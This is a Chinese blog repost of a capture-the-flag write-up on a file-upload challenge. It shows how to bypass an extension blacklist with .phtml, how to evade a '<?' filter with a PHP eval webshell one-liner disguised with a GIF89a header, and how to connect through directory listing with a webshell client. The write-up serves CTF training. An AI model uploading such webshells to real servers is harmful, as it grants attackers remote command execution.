BUUFCTF—[极客大挑战 2019]Upload 1

这篇具有很好参考价值的文章主要介绍了BUUFCTF—[极客大挑战 2019]Upload 1。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

考点:

  • 文件上传黑名单绕过
  • 内容绕过
  • 目录浏览

文件上传

BUUFCTF—[极客大挑战 2019]Upload 1

1. 测试是黑名单还是白名单

上传图片1.png成功,上传1.php失败,1.pngs成功,说明是黑名单过滤。

所以要寻找黑名单外的php文件:php, php3, php5, php7, phtml都能作为php文件解析

ps:有些服务器默认不解析php3 phhtml等,如phpstudy2018中,需要设置

BUUFCTF—[极客大挑战 2019]Upload 1

.phtml能成功上传

2. 判断是否对内容进行过滤

BUUFCTF—[极客大挑战 2019]Upload 1

发现过滤 <?,而普通的php 木马都会携带<?,我们可以使用js+php进行bypass,这样在shell中就不会携带<?

<script language='php'>@eval($_POST['cmd']);</script>

再次提交,提示不是一张图片

BUUFCTF—[极客大挑战 2019]Upload 1

加个gif文件头

GIF89a <script language='php'>@eval($_POST['cmd']);</script>

成功上传

BUUFCTF—[极客大挑战 2019]Upload 1

3. 寻找上传的文件位置

页面只提示了上传文件名,未能发现上传的路径

所以尝试是否存在目录浏览,经测试发现/upload目录可以浏览

BUUFCTF—[极客大挑战 2019]Upload 1

找到上传的文件使用蚁剑连接

BUUFCTF—[极客大挑战 2019]Upload 1

BUUFCTF—[极客大挑战 2019]Upload 1文章来源地址https://www.toymoban.com/news/detail-440802.html

到了这里,关于BUUFCTF—[极客大挑战 2019]Upload 1的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • [极客大挑战 2019]PHP1-超详细

    [极客大挑战 2019]PHP1 提示:有一个良好的备份网站的习惯 寻找一个备份文件字典,我在github上找的: scopion/dic: 渗透字典,框架信息泄露,备份文件泄露,配置文件泄露。字典 (github.com) 我用的是top7777.txt字典,扫的很慢。 扫出来www.zip这个文件,然后下载下来 ,里面只有in

    2023年04月08日
    浏览(35)
  • BUUCTF [极客大挑战 2019]BuyFlag1

    进入靶场,发现有 另一个buyflag页面 告诉我们如果要买flag,必须是cuit的学生,必须有正确的密码,查看源码,发现密码已经告诉我们  这里涉及post传递两个参数money和password,is_numeric的绕过 和password==404的弱比较,通过burpsuite抓包  这里有个cookie:user=0猜测cuit学生的cookie是

    2023年04月14日
    浏览(39)
  • BUUCTF [极客大挑战 2019]Knife1

     连接蚁剑,连接密码为Syc 在 / 文件夹下找到flag文件 打开得到flag

    2024年02月09日
    浏览(38)
  • [网络安全/CTF] BUUCTF极客大挑战2019PHP解题详析(Dirsearch使用实例+php反序列化)

    提示:有一个良好的备份网站的习惯 故使用dirsearch工具扫描目录 得到的扫描结果中包含www.zip目录 通过url路径下载zip文件: index.php中含有关键代码: Get传参传入一个参数select,后端将其序列化 class.php: construct 是构造函数,在对象被创建的时候自动调用,进行类的初始化,

    2024年02月05日
    浏览(77)
  • hvv 文件上传和文件包含考点

    数据包分析 观察客户端请求数据:是否包含webshell流量特征 观察服务器返回信息:是否有“上传成功”或“success upload”等信息提示 尝试寻找上传的文件:访问上传的文件看是否存在;查看文件上传的目录,去目录下查找文件是否存在; 通过分析平台日志查看:如果存在文

    2024年02月11日
    浏览(47)
  • Vue Element upload组件和Iview upload 组件上传文件

    今天要分享的是使用这俩个UI组件库的upload组件分别实现调用组件本身的上传方法实现和后台交互。接下来就是开车的时间,请坐稳扶好~ 一、element upload组件传送门  1、html文件 注意事项: 使用组件本身的上传事件,必须加auto-upload属性设置为false;                 

    2024年02月11日
    浏览(43)
  • MySQL 8.0 OCP (1Z0-908) 考点精析-架构考点1:二进制日志文件(Binary log)

    【免责声明】文章仅供学习交流,观点代表个人,与任何公司无关。 编辑|SQL和数据库技术(ID:SQLplusDB) MySQL中有多种类型的日志文件,这些日志可用于故障排除、性能调整和审计等目的,帮助找出正在发生的活动。 常见的日志文件包括: 日志类型 写入日志的信息 错误日志(

    2024年02月16日
    浏览(60)
  • ElementUI —— Upload 文件上传

    前言 :            实现单文件上传!此文章仅记录代码如何实现,便于后期项目学习使用!! 代码实现 :

    2024年02月16日
    浏览(59)
  • 文件上传漏洞 (upload部分通关教程)

    只适合只有前端验证的网站 一句话木马: 保存到文件中: 使用第一关直接上传,报错: 按照网站要求,修改文件后缀名为jpg: 重新上传111.jpg文件,打开burp抓包,修改包中的后缀名 点击Forword上传,上传成功: 使用蚁剑连接后台步骤: 复制url: 连接成功: 原理就是验证后

    2024年02月22日
    浏览(43)
  • Ant Design upload 文件上传 限制文件只能上传一个

    上传前:                 回显:可以删除   最近做了一个后台管理系统使用的是 Ant Design和vue框架搭建的 文件上传 :组件:  Ant Design   https://1x.antdv.com/components/upload-cn/  (upload 官方文档) 功能需求 : 1.可以拖拽,或者点击上传文件  2.只能上传单个文件,不能上传多个文

    2024年02月14日
    浏览(45)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包